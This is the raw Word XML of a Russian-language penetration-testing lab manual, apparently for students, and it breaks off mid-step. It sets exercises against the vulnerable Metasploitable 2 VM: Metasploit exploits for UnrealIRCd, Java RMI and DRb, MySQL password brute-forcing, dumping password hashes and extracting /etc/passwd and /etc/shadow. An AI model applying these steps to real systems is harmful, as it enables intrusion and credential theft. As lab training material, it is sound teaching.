                <v:shape id="Shape 7" o:spid="_x0000_s1033" type="#_x0000_t75" style="position:absolute;left:1524;top:1524;width:73152;height:4962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f7yXCAAAA2gAAAA8AAABkcnMvZG93bnJldi54bWxEj8FqwzAQRO+B/oPYQG+xnBya1LUSQiGl&#10;FGKIY3perK1tYq2MpNru31eFQo7DzLxh8sNsejGS851lBeskBUFcW91xo6C6nlY7ED4ga+wtk4If&#10;8nDYPyxyzLSd+EJjGRoRIewzVNCGMGRS+rolgz6xA3H0vqwzGKJ0jdQOpwg3vdyk6ZM02HFcaHGg&#10;15bqW/ltFByL2+DLvpjOH90z7ir5Zl31qdTjcj6+gAg0h3v4v/2uFWzh70q8AXL/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23+8lwgAAANoAAAAPAAAAAAAAAAAAAAAAAJ8C&#10;AABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAjgMAAAAA&#10;">
                  <v:imagedata r:id="rId74" o:title=""/>
                </v:shape>
                <v:rect id="Прямоугольник 2" o:spid="_x0000_s1034" style="position:absolute;left:22252;top:13821;width:9018;height:24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jVRMAA&#10;AADaAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDMBCE74G+g9hAbrGUHEJwrQS3UEhPpvnpeZG2&#10;tqm1MpbiuG8fFQI5DjPfDFPsJ9eJkYbQetawyhQIYuNty7WG8+ljuQURIrLFzjNp+KMA+93LrMDc&#10;+ht/0XiMtUglHHLU0MTY51IG05DDkPmeOHk/fnAYkxxqaQe8pXLXybVSG+mw5bTQYE/vDZnf49Vp&#10;WFcXqt/KT7fx0pTKf4+qOlVaL+ZT+Qoi0hSf4Qd9sImD/yvpBsjd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UjVRMAAAADaAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" filled="f" strokecolor="red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01AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49C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Прямоугольник 3" o:spid="_x0000_s1035" style="position:absolute;left:3038;top:16468;width:16077;height:58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Rw378A&#10;AADaAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE7wv+h/AEb2uigkg1ShUEPZXVXc+P5tkW&#10;m5fSxFr/vREWPA4z8w2z2vS2Fh21vnKsYTJWIIhzZyouNPye998LED4gG6wdk4YnedisB18rTIx7&#10;8A91p1CICGGfoIYyhCaR0uclWfRj1xBH7+paiyHKtpCmxUeE21pOlZpLixXHhRIb2pWU3053q2Ga&#10;/VGxTY927mSeKnfpVHbOtB4N+3QJIlAfPuH/9sFomMH7SrwB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OBHDfvwAAANoAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABAD1AAAAhAMAAAAA&#10;" filled="f" strokecolor="red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01AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49C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47A12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2. Добавить сканирование в режиме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 xml:space="preserve">Автоматический поиск </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>эксплоитов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с расширенными настройками по умолчанию.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Замечание:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для использования автоматического поиска </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>эксплойтов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> должен быть произведен поиск уязвимостей при помощи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Сканер-ВС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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="21D648AC" wp14:editId="34AEAF4C">
            <wp:extent cx="5940115" cy="2400300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25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  <w:highlight w:val="red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203F58F" wp14:editId="1CF05980">
            <wp:extent cx="5337486" cy="2054084"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="339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7486" cy="2054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Результаты сканирования в режиме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Автоматического поиска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:</w:t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5B454C2" wp14:editId="22249CE6">
            <wp:extent cx="5574554" cy="1144168"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340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4554" cy="1144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3. Добавить задачу в режиме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 xml:space="preserve">Ручной поиск </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>эксплоитов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t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1C41DD5" wp14:editId="5BB92861">
            <wp:extent cx="5252820" cy="1999040"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1270"/>
            <wp:docPr id="347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820" cy="199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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="13F38310" wp14:editId="7FF7C497">
            <wp:extent cx="5940115" cy="1244600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35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Результаты ручного поиска:</w:t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A8743DE" wp14:editId="52436800">
            <wp:extent cx="5940115" cy="977900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="320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4. Сравнить результаты поиска.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b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc107507613"/>
      <w:bookmarkStart w:id="26" w:name="_Toc107513732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4.3.</w:t>
      </w:r>
      <w:r w:rsidR="00347A12">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Использование командной строки </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для эксплуатац</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ии уя</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>звимостей</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26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использовать командную строку в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для эксплуатац</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ии уя</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>звимостей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00347A12" w:rsidP="00EF49CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с помощью консоли </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit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Framework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провести эксплуатацию следующих уязвимостей на сервере </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable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2: 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unreal_ircd_3281_backdoor;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java_rmi_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>drb_remote_codeexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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Запустить консоль </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit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Framework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2. Выбрать уязвимость /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>unix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irc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/unreal_ircd_3281_backdoor и вывести список параметров.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1832E26" wp14:editId="608E3CC6">
            <wp:extent cx="3908286" cy="2122426"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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 rotWithShape="1">
                    <a:blip r:embed="rId81"/>
                    <a:srcRect b="3583"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3914700" cy="212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3. Добавить полезную нагрузку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001411FD" w:rsidRDefault="00EF49CB" w:rsidP="001411FD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59FC29B" wp14:editId="1CF97C78">
            <wp:extent cx="5283200" cy="2157444"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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0102" cy="2156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411FD">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00347A12" w:rsidRDefault="00EF49CB" w:rsidP="00347A12">
      <w:r w:rsidRPr="00EF49CB">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Шаг 4. Назначить параметры и запустить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:t>эксплойт</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00347A12">
      <w:pPr>
        <w:spacing w:after="24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77CD705" wp14:editId="5B519137">
            <wp:extent cx="5255682" cy="3593630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="28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475" cy="3593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7A12" w:rsidRDefault="00EF49CB" w:rsidP="001411FD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9E09218" wp14:editId="3751A28C">
            <wp:extent cx="5184636" cy="2305634"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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13" cy="2308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5. Выбрать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploit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multi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misc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java_rmi_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и вывести параметры.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CF0EFAB" wp14:editId="2227513C">
            <wp:extent cx="5266266" cy="1992900"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="37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178" cy="1991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6. Добавить полезную нагрузку.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7D1C7F6" wp14:editId="75F111A3">
            <wp:extent cx="5604934" cy="2216926"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="364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1648" cy="2215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7. Назначить параметры и запустить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>эксплойт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269C2CC" wp14:editId="6E62EF3D">
            <wp:extent cx="5940115" cy="3035300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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F9D" w:rsidRDefault="00EF49CB" w:rsidP="005F5F9D">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0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F5F20D7" wp14:editId="3F7BB35E">
            <wp:extent cx="5940115" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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F9D" w:rsidRDefault="005F5F9D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8. Выбрать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploit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linux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misc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drb_remote_codeexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и вывести параметры.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7BCB92D" wp14:editId="1E18EF48">
            <wp:extent cx="5689600" cy="1896533"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8890"/>
            <wp:docPr id="31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 rotWithShape="1">
                    <a:blip r:embed="rId89"/>
                    <a:srcRect b="3163"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5686264" cy="189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9. Добавить полезную нагрузку.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82949CD" wp14:editId="3300EBC8">
            <wp:extent cx="5705475" cy="371475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28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10. Назначить параметры и запустить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>эксплойт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AC7716D" wp14:editId="10573552">
            <wp:extent cx="5604933" cy="2277533"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="27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 rotWithShape="1">
                    <a:blip r:embed="rId91"/>
                    <a:srcRect b="3524"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5614916" cy="228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5F5F9D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EC1000D" wp14:editId="2D2BEBA9">
            <wp:extent cx="5943600" cy="2717800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="354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 rotWithShape="1">
                    <a:blip r:embed="rId92"/>
                    <a:srcRect b="1440"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940115" cy="271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b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc107507614"/>
      <w:bookmarkStart w:id="28" w:name="_Toc107513733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4.4. Парольные атаки на СУБД</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28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тестировать защищенность СУБД.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Задание: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с</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> помощью NMAP и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit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Framework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определить, какие СУБД функционируют на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable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2;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с</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">формировать файлы с распространенными паролями, подобрать пароли для доступа и пройти авторизацию;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п</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">олучить содержимое таблиц с именами пользователей и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хешами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паролей с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit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Framework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;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в</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ыгрузить файлы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>passwd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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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п</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">одключиться к СУБД через соответствующие консоли, создать пользователя, экспортировать таблицы с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хешами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паролей, используя SQL-запросы. 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С помощью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nmap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определить</w:t>
      </w:r>
      <w:r w:rsidR="005F5F9D">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> какие СУБД используются на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2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5F9D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602E7A9" wp14:editId="087DFB3D">
            <wp:extent cx="5940115" cy="3263900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32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F9D" w:rsidRDefault="005F5F9D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2. С помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit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Framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> определить версию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MySQL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5F5F9D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B9BEF41" wp14:editId="38367684">
            <wp:extent cx="5940115" cy="2425700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="344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3. Скопировать файлы users.txt и passwords.txt в папку </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Запустить подбор паролей к </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MySQL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E5CA213" wp14:editId="12C25A3E">
            <wp:extent cx="5940115" cy="2438400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28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sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          </w:rPr>
          <w:tag w:val="goog_rdk_14"/>
          <w:id w:val="172227769"/>
        </w:sdtPr>
        <w:sdtContent/>
      </w:sdt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B12A11E" wp14:editId="64BBA209">
            <wp:extent cx="5924550" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24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F9D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1485C64" wp14:editId="300D4B89">
            <wp:extent cx="5940115" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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F9D" w:rsidRDefault="005F5F9D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4. Выгрузить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хеши</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> паролей пользователей.</w:t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462761E" wp14:editId="605A41C0">
            <wp:extent cx="5940115" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37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5. Подключиться к </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
